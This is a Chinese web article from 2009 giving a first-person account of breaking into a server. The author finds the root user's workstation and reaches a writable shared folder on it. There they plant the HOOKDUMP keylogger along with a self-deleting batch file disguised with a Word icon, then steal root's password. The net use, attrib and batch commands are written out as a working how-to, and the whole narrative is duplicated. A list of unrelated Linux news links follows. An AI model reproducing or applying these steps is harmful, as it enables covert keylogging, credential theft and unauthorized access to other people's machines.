黑客怎樣入侵Linux系統
發(fā)布時間:2009-06-29 02:09:21 作者:佚名
我要評論
我發(fā)現了一個網站,于是常規(guī)入侵。很好,它的FINGER開著,于是我編了一個SHELL,aaa帳號試到zzz(by the way,這是我發(fā)現的一個網上規(guī)律,那就是帳號的長度與口令的強度成正比,如果一個帳號只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結果一個
我發(fā)現了一個網站,于是常規(guī)入侵。很好,它的FINGER開著,于是我編了一個SHELL,aaa帳號試到zzz(by the way,這是我發(fā)現的一個網上規(guī)律,那就是帳號的長度與口令的強度成正比,如果一個帳號只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結果一個帳號也不存在,我沒有再試它的帳號。因為我被它開的端口吸引住了,它開著WWW,我就不信它不出錯。一連拿了五種CGI和WWW掃描器總計掃了三四百種常見錯誤它幾乎都不存在還是看看root的信息吧:
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經常來,那個202.xx.xx.xx就是他用的工作站了,從那會不會看到點東西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上網的機器上開著WINDOWS的“文件和打印機共享”的服務,是很多人容易掉以輕心的,這個root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢,現在開了共享的目錄沒有一個是根目錄,連D驅的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,里面盡是些英文原著,這個root還挺行的。“我的公文包”吸引了我的注意,這是一個用于將不同的機器上的資料進行同步的工具,很顯然這個root要經常更新主機上的主頁,有時候在自己的機器上編,有時候在主機上編……所以很重要的一點:“我的公文包”的共享一般都是可寫的!
那我再進去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不錯,確實可寫。
>del temp.txt
不留痕跡——黑客的習慣。
>dir/od/p
看看都有些什么…… 倒數第二排那個是什么?“X月工作計劃.doc”!就是它了,既然是計劃就不可能寫完了就丟一邊,它肯定會再次打開它的——至少下個月寫計劃時要COPY一下:->
page
該動手了,我的目標就是讓它下次打開時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟件HOOKDUMP,我覺得它挺好的,價錢實惠,量也足…… 對不起,說習慣了,應該是它不僅記錄下全部擊鍵,還記錄下打開或關掉了什么程序、按過什么按紐、用過什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計算機一樣詳細了。您要問那么多木馬你為啥裝這個?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號偵查對象,而一個root的機器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機會就少了……
>copy hookdump.* i:
補充一點:上傳前先編好它的hookdump.ini文件,置為隱藏方式運行,不然root一運行屏幕上蹦出一大窗口可就……。
然后再在自己的機器上編一個同名的BAT文件:X月工作計劃.BAT
>edit c:X月工作計劃.BAT
@echo off
hookdump
attrib -h X月工作計劃.doc
C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運行了這個BAT文件實際上就是先運行木馬,再調用WINWORD文件打開它想開的這個文件,然后自我刪除,也許它機器上WINWORD的位置不同,那調用就會失敗,不過不要緊,反正BAT會馬上刪除,他會以為是自己的誤操作。
這時你的C驅根目錄就有了這么一個BAT文件,它是一個方形的圖標,和那個WORD文件大相徑庭,root怎么會運行它呢?沒關系,在這個文件上點右鍵,點屬性,在“程序”欄選“更改圖標”不就行了嗎?WORD的圖標在你機器C:Program FilesMicrosoftOffice中。還要將“運行”改為“最小化”,“退出時關閉”打上勾,這樣才能保證在運行時一點跡象也沒有。事實上這個 BAT文件變成了兩個,還有一個PIF文件就是它的圖標。
把這兩個文件傳上去:
>copy X月工作計劃.bat i:
>copy X月工作計劃.pif i:
然后把它的文件和自己的文件都藏起來:
>attrib +h X月工作計劃.doc
>attrib +h X月工作計劃.bat
這樣,root的“公文包”里只剩下一個和原來一模一樣的WORD圖標,他做夢也沒想到這已變成了一個BAT文件。然后可以喘口氣了,讓我們靜靜的等……
幾天后,我進入這個工作站,取下記錄下來的擊鍵記錄,找出root的口令,進入主機。
finger root@xxx.xxx.xxx
Login name: root In real life: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
No Plan.
root經常來,那個202.xx.xx.xx就是他用的工作站了,從那會不會看到點東西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我的公文包
The command was completed successfully.
在上網的機器上開著WINDOWS的“文件和打印機共享”的服務,是很多人容易掉以輕心的,這個root沒有例外。如果它的C盤共享了而且可寫那就好了,但那是做夢,現在開了共享的目錄沒有一個是根目錄,連D驅的都沒有。別著急,慢慢來。x掉的那些文件夾都沒用,不能寫,里面盡是些英文原著,這個root還挺行的。“我的公文包”吸引了我的注意,這是一個用于將不同的機器上的資料進行同步的工具,很顯然這個root要經常更新主機上的主頁,有時候在自己的機器上編,有時候在主機上編……所以很重要的一點:“我的公文包”的共享一般都是可寫的!
那我再進去看看。
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不錯,確實可寫。
>del temp.txt
不留痕跡——黑客的習慣。
>dir/od/p
看看都有些什么…… 倒數第二排那個是什么?“X月工作計劃.doc”!就是它了,既然是計劃就不可能寫完了就丟一邊,它肯定會再次打開它的——至少下個月寫計劃時要COPY一下:->
page
該動手了,我的目標就是讓它下次打開時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟件HOOKDUMP,我覺得它挺好的,價錢實惠,量也足…… 對不起,說習慣了,應該是它不僅記錄下全部擊鍵,還記錄下打開或關掉了什么程序、按過什么按紐、用過什么菜單…… 總之,它的記錄讓你就和你站在他身后看他操作計算機一樣詳細了。您要問那么多木馬你為啥裝這個?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟件列為頭號偵查對象,而一個root的機器上可不可能沒裝殺毒軟件?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機會就少了……
>copy hookdump.* i:
補充一點:上傳前先編好它的hookdump.ini文件,置為隱藏方式運行,不然root一運行屏幕上蹦出一大窗口可就……。
然后再在自己的機器上編一個同名的BAT文件:X月工作計劃.BAT
>edit c:X月工作計劃.BAT
@echo off
hookdump
attrib -h X月工作計劃.doc
C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc
attrib -h temp.bat
del temp.pif
del temp.bat
看明白了吧?root運行了這個BAT文件實際上就是先運行木馬,再調用WINWORD文件打開它想開的這個文件,然后自我刪除,也許它機器上WINWORD的位置不同,那調用就會失敗,不過不要緊,反正BAT會馬上刪除,他會以為是自己的誤操作。
這時你的C驅根目錄就有了這么一個BAT文件,它是一個方形的圖標,和那個WORD文件大相徑庭,root怎么會運行它呢?沒關系,在這個文件上點右鍵,點屬性,在“程序”欄選“更改圖標”不就行了嗎?WORD的圖標在你機器C:Program FilesMicrosoftOffice中。還要將“運行”改為“最小化”,“退出時關閉”打上勾,這樣才能保證在運行時一點跡象也沒有。事實上這個 BAT文件變成了兩個,還有一個PIF文件就是它的圖標。
把這兩個文件傳上去:
>copy X月工作計劃.bat i:
>copy X月工作計劃.pif i:
然后把它的文件和自己的文件都藏起來:
>attrib +h X月工作計劃.doc
>attrib +h X月工作計劃.bat
這樣,root的“公文包”里只剩下一個和原來一模一樣的WORD圖標,他做夢也沒想到這已變成了一個BAT文件。然后可以喘口氣了,讓我們靜靜的等……
幾天后,我進入這個工作站,取下記錄下來的擊鍵記錄,找出root的口令,進入主機。
相關文章

Fedora Linux 42 穩(wěn)定版發(fā)布: 帶來大量新功能和軟件更新
Fedora 42昨日發(fā)布,這是 Red Hat 贊助開發(fā)的杰出前沿 Linux 發(fā)行版的最新版,包含大量新功能和軟件更新,使其成為 2025 年上半年發(fā)布的一款出色的 Linux 操作系統之一,內2025-04-16
如何在Linux查看硬盤信息? 查看Linux硬盤大小類型和硬件信息的5種方法
使用Linux系統的過程中,查看和了解硬盤信息是非常重要的工作,尤其是對于系統管理員而言,那么在Linux系統中如何查看硬盤信息?以下是具體內容介紹2025-03-12
如何在 Linux 中查看 CPU 詳細信息? 3招輕松查看CPU型號、核心數和溫度
在日常運維工作中,獲取 CPU 信息是系統運維管理員常見的工作內容,無論是為了性能調優(yōu)、硬件升級還是僅僅滿足好奇心2025-03-11
什么是 Arch Linux? 獨樹一幟的Arch Linux發(fā)行版分析
Arch Linux是為簡化,優(yōu)化,現代化,實用主義,用戶中心和多功能性而創(chuàng)建Linux發(fā)行版,究竟是什么讓 Arch 與眾不同?下面我們就來簡要解讀2025-02-19
如何在Linux環(huán)境下制作 Win11裝機U盤?
一直用的linux辦公,想要將筆記本電腦從 Linux 系統切換回 Windows 11,我們可以制作一個win11裝機u盤,詳細如下2025-02-17
Rsnapshot怎么用? 基于Rsync的強大Linux備份工具使用指南
Rsnapshot 不僅可以備份本地文件,還能通過 SSH 備份遠程文件,接下來詳細介紹如何安裝、配置和使用 Rsnapshot,包括創(chuàng)建每小時、每天、每周和每月的本地備份,以及如何進2025-02-06
Linux Kernel 6.13發(fā)布:附更新內容及新特性解讀
Linux 內核 6.13 正式發(fā)布,新版本引入了惰性搶占支持,簡化內核搶占邏輯,通過減少與調度器相關的調用次數,讓內核在運行時表現更優(yōu),從而提高效率2025-01-23
五大特性引領創(chuàng)新! 深度操作系統 deepin 25 Preview預覽版發(fā)布
今日,深度操作系統正式推出deepin 25 Preview版本,該版本集成了五大核心特性:磐石系統、全新DDE、Treeland窗口合成器、AI For OS以及Distrobox子系統2025-01-18
Linux Mint Xia 22.1重磅發(fā)布: 重要更新一覽
Beta 版 Linux Mint“Xia” 22.1 發(fā)布,新版本基于 Ubuntu 24.04,內核版本為 Linux 6.8,這次更新帶來了諸多優(yōu)化和改進,進一步鞏固了 Mint 在 Linux 桌面操作系統領域的2025-01-16
LinuxMint怎么安裝? Linux Mint22下載安裝圖文教程
Linux Mint22發(fā)布以后,有很多新功能,很多朋友想要下載并安裝,該怎么操作呢?下面我們就來看看詳細安裝指南2025-01-16








